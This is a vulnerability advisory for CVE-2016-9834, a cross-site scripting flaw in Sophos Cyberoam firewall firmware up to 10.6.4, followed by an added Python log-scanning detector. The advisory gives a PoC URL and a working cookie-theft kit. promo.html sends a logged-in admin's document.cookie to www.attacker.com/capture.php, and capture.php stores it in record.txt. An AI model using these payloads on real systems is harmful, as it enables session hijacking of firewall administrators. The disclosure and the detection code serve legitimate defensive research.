# Exploit Title: Sophos Cyberoam – Cross-site scripting (XSS) vulnerability
# Date: 25/05/2017
# Exploit Author: Bhadresh Patel
# Version: <= Firmware Version 10.6.4
# CVE : CVE-2016-9834

This is an article with video tutorial for the Sophos Cyberoam – Cross-site scripting (XSS) vulnerability

--------------------------------------------------------------------------------------------------------------------------

Title:
====
Sophos Cyberoam – Cross-site scripting (XSS) vulnerability

Credit:
======
Name: Bhadresh Patel

Date:
====
25/05/2017 (dd/mm/yyyy)

Vendor:
======
More than 100 million users in 150 countries rely on Sophos to offer end-to-end protection against complex threats and data loss. Sophos is committed to providing complete, enterprise-grade security solutions that are simple to deploy, manage and use, and deliver one of the industry's lowest total cost of ownership. Sophos offers award-winning security solutions covering endpoint, mobile, server, encryption, web, email, Wi-Fi, and UTM/next-generation firewall, all backed by SophosLabs -- a global threat analysis center which provides real-time cloud-enabled security intelligence. Sophos is headquartered in Oxford, UK.

Vulnerable Product:
==============
Sophos Cyberoam Firewall

Cyberoam Next-Generation Firewalls are based on CyberoamOS – an intelligent and powerful firmware that offers next-generation security features including inline application inspection and control, website filtering, HTTPS inspection, Intrusion Prevention System, VPN (IPSec and SSL) and QoS/bandwidth management. Additional security features like Web Application Firewall, Gateway Anti-Virus and Gateway Anti-Spam are also available.

Customer Product link: https://www.cyberoam.com

Abstract:
=======
A cross-site scripting (XSS) vulnerability in the Sophos Cyberoam firewall enables attackers to execute scripts in a victim's browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user's browser using malware, etc.

Affected Software Version:
=============
<= Firmware Version 10.6.4

Vendor Response
=============
Sophos is committed to working with the security community in identifying, remediating and communicating security issues in our products. Customers are advised to upgrade their Cyberoam OS to v.10.6.5, which addresses this issue.

Exploitation-Technique:
===================
Remote

Severity Rating (CVSS):
===================
6.9 (Medium) (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N)

CVE ID:
=======
CVE-2016-9834

Details:
=======
This vulnerability allows remote attackers to execute arbitrary client-side script in the active user's browser session when that user is logged into the Cyberoam firewall. User interaction is required to exploit this vulnerability: the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of requests to the "LiveConnectionDetail.jsp" application. The GET parameters "applicationname" and "username" are improperly sanitized, allowing an attacker to inject arbitrary JavaScript into the page. This can be abused by an attacker to perform a cross-site scripting attack on the user.

Vulnerable module/page/application: /corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp
Vulnerable parameters: applicationname and username

=======
*PoC*
http://192.168.30.30/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=OTHER%20APPLICATIONS46449";alert(document.cookie)//181&username=NA

*PoC Video*
https://www.youtube.com/watch?v=NmLPL2TYPcg

*Real world scenario*
1) Victim (Admin) logs in to the Sophos Cyberoam web console
2) Sophos Cyberoam FW is on the latest version
3) record.txt is empty on the attacker page
4) Victim (Admin) visits the attacker URL/page http://www.attacker.com/promo.html
5) XSS successful and attacker captured the cookie in record.txt

-------------------------- Source code (promo.html) ----------------------------------
<html>
<head>
<script>
window.location="http://192.168.30.30/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=OTHER%20APPLICATIONS46449\";document.location='http://www.attacker.com/capture.php?content='.concat(escape(document.cookie));//181&username=NA"
</script>
</head>
<body>
</body>
</html>

-------------------------- Source code (capture.php) ----------------------------------
<?php
file_put_contents('record.txt', $_GET['content']);
echo "<HTML><body><script>window.location=\"http://192.168.30.30/corporate/webpages/index.jsp\"</script></body></HTML>";
?>

Credits:
=======
Bhadresh Patel

--------------------------------------------------------------------------------------------------------------------------
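Added here as a defender-side example, not part of the advisory: a small access-log check that flags requests to the vulnerable LiveConnectionDetail.jsp page whose "applicationname" or "username" parameters carry the JavaScript string-breakout characters seen in the PoC payload above. The endpoint path and parameter names come from the advisory; the log lines and the combined-log format are constructed for the example.

```python
# Added example: detect XSS attempts against the Cyberoam endpoint named in the
# advisory by inspecting the two vulnerable GET parameters in web-server access
# logs. Log lines below are constructed, not taken from a real appliance.
import re
from urllib.parse import urlsplit, parse_qs, unquote

VULN_PATH = "/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp"
WATCHED_PARAMS = ("applicationname", "username")

# Characters that terminate a JS string literal or a <script> block; legitimate
# application names and usernames on this page do not need any of them.
BREAKOUT = re.compile(r'["\'\\<>;]')

# Request line of a combined-log-format entry: "METHOD URL HTTP/x.y"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[0-9.]+"')


def suspicious_params(url: str) -> dict:
    """Return {param: decoded value} for watched params that contain breakout chars."""
    parts = urlsplit(url)
    if parts.path != VULN_PATH:
        return {}
    hits = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            # parse_qs already decoded once; decode again to catch double encoding
            decoded = unquote(value)
            if BREAKOUT.search(decoded):
                hits[name] = decoded
    return hits


def scan_log(lines):
    """Yield (client_ip, param, value) for every suspicious request in the log."""
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        for param, value in suspicious_params(m.group("url")).items():
            yield client_ip, param, value


# Constructed sample log: a benign request, one carrying the PoC payload, and a
# request to a different page that must not be flagged even though it has a quote.
SAMPLE_LOG = [
    '10.0.0.5 - admin [25/May/2017:10:01:02 +0000] "GET /corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=HTTP&username=jsmith HTTP/1.1" 200 5120',
    '10.0.0.9 - admin [25/May/2017:10:03:44 +0000] "GET /corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=OTHER%20APPLICATIONS46449%22%3Balert(document.cookie)%2F%2F181&username=NA HTTP/1.1" 200 5203',
    '10.0.0.9 - admin [25/May/2017:10:04:10 +0000] "GET /corporate/webpages/index.jsp?user=%22%3B HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for ip, param, value in scan_log(SAMPLE_LOG):
        print(f"{ip} injected into {param}: {value!r}")
```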